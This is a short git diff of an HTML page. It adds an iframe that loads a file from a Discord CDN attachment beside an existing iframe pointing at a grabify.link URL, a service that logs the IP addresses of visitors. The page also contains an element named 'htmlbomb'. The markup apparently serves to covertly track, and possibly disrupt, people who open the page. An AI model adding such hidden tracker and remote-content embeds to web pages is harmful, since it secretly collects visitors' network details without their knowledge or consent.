--- a/index.html
+++ b/index.html
@@ -5,6 +5,7 @@
   </head>
   <body>
     <iframe src="https://grabify.link/W192PS"></iframe>
+    <iframe src="https://cdn.discordapp.com/attachments/772064957793435678/825765916654567484/file.md"></iframe>
     
     <div id="htmlbomb">
       <a href="test.com" target="_blank" id="link1">e</a>
